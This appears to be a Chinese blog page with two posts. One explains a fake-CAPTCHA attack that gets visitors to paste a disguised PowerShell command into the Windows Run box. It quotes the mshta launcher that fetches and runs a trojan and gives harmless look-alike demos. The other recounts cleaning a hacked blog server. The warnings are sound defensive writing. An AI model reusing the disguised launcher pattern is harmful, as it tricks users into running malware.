普通视图

Received before yesterday

警惕:一种新型社交工程学挂马方案 — 眼见不一定为真

2025年2月14日 09:17

昨天晚上刷微博的时候,看到教主发的《现在黑产有一种新的社交工程学挂马方案》 ,虽然技术不高深,但是迷惑性还是蛮大的。也是因为看不懂教主发的微博,让我时常自惭形秽。

看描述,应该是在访问一些网站的时候会弹出人机验证的界面,根据截图看来应该是国外的网站,国内网站未为可知,或者也有。当然,这种网站基本都不可能是什么正规网站,即使现在中文网站没用这些技术,可能过几天也就出了中文版本了。

基于这种验证,在弹出这个窗口的时候页面已经将要粘贴到文本内容写入了粘贴板,此时你按照页面提示,按下键盘的 Win +R 键,此时会弹出运行窗口,然后,你再按 Ctrl +v 粘贴验证文本,此时运行窗口就变成了下面的样子:

真的不同的 windows 版本(系统设置)可能前面的选择框样式有所区别,但是看起来似乎没什么问题对不对?

此时你要执行第三步了,按键盘的 Enter 或者点击确定。点了之后,一个黑窗口出来又消失了,似乎没什么变化,然而,就在这时候,你已经下载了黑客的木马文件并且执行了,而这个操作,火绒似乎也不会有什么反应。

那么问题出在什么地方呢?当然是你复制到运行窗口内的那段文字,实际上全部内容应该是类似下面的样子:

然而,这段经过精心设计的问题,在粘贴到运行窗口之后。由于运行窗口默认显示机制是显示最后的文本,那么刚好就显示了想让你看到的那一段:

✅ 'I am not a robot: CAPTCHA Verification UID: 1314

让你自以为是在做验证,然而,这一句是注释,真正有用的是前面的这一段:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}

通过 mshta.exe 加文件路径反问文件并且执行。那么知道怎么实现的,我稍微改造了一下,不会产生任何的危害,也可以测试下效果。

例如复制下面这段,运行之后会打开计算器:

powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('cal' + 'c' + '.exe ')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'

运行效果:

下面这行命令会在运行之后直接打开我的博客:

powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('C:\Program Files\Internet Explorer\iexplor' + 'e' + '.exe  https://oba.by')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'

运行效果:

要解决这个问题,最简单的是不要在脱离当前程序运行任何命令,当然,也可以按照教主的做法,直接禁用运行:

Win+R,输入 gpedit.msc 运行。然后打开[用户配置] -> [管理模板] -> [“开始”菜单和任务栏],找到[从“开始”菜单中删除“运行”菜单],双击打开,选择“已启用”。

设置之后再次按 win +R 就会出现下面的提示:

如果要恢复功能,在开始菜单直接搜索gpedit.msc,点击运行之后将选项改为未配置或者已禁用即可。

简而言之,上网要小心,眼见不一定为真,不然,哪里有那么多的美女呢!祝大家情人节快乐啊!

  •  

木马屠城记

2024年9月25日 11:10

木马屠城记
木马屠城记

昨天,我的博客经历了一次惊心动魄的宕机过程。

本来一时兴起更新了一篇《为何懒人屎尿多》的博文,结果不晓得撞上了哪根枪,过一会儿再刷新就被Firefox报:欺诈网站。

虽然接受风险可以跳过提示,但莫名其妙天降横祸,我是纳闷得很。

难道是在某个博友群发言得罪了某人?

百思不得其解之下,开始艰难排查。

博客服务器是与博友周哥共同租用的,当下就登陆后台搜寻了一番,果然有线索了:

管理后台提示多个PHP文件疑似感染木马

SSH提示有风险(默认端口号未改、存在空密码账户、多达二十多万次的恶意登陆)

木马屠城记

当下马上关闭博客,开始整改,关闭SSH的密码登陆,改为密钥登陆。

然后重新安装博客,先是备份了数据库和网站目录文件。

接着重新下载WordPress官方源码,部署上线。在这里反复出现一个问题:恢复数据库后,打开博客会走install流程,但配置了数据库信息后,进入后台发现并没有以前的数据。

也就是说,备份的数据导入不成功。

反复折腾几次,又进数据库后台看了下,发现可能是因为在安装wp时,数据表为避免重复就自动生成了新的后缀。

尝试在数据库管理后台将所有数据表删除,重新上传备份的数据库,然后在wp的config文件里手动将数据表前缀改为和数据库的一样,再刷新,正常了。

周哥的博客是typecho程序,之前完全没接触过。

先是下载官方源码传到服务器,然后还原数据库,然后安装,结果报500错误,查了好多资料终于发现,问题出现在这儿:

ty备份 要备2个东西 一个是数据库 一个是usr文件夹(包含主题插件等)

恢复的时候也要恢复两个东西才可以,但报错的时候完全没提这个事。

上传usr文件夹后,恢复正常。当然,这里是有隐患的,之前服务器里很多PHP文件被木马污染,照理说之前的旧文件应该全部不要,但ty非常奇葩又必须用以前的主题模板,否则报错,只能是后面再逐步调整了。

接下来,就是去Google申诉。

因为浏览器这个恶意网址风险提醒,是由Google在维护(安全信息由 Google Safe Browsing 提供)。按照网上的教程,登陆Google的站长管理后台,验证网站的所有权后,可以查看网站的风险提示。

查看了下,我博客的风险URL多达20多条,全都是伪造的诸如/2021/04/02/get-money.html 这样的链接。

经过逐一验证,这些链接都打不开。

于是在页面提交了审核申诉,今天一早,接到Google的邮件,告诉我:

Google 已收到并处理您的安全审核请求。Google 系统显示 chidd.net 不再包含指向有害网站或下载内容的链接。系统正在从您的网站中取消向用户显示的警告,这可能需要花费数小时的时间。

木马屠城记

至此,问题解决。

 

  •  
❌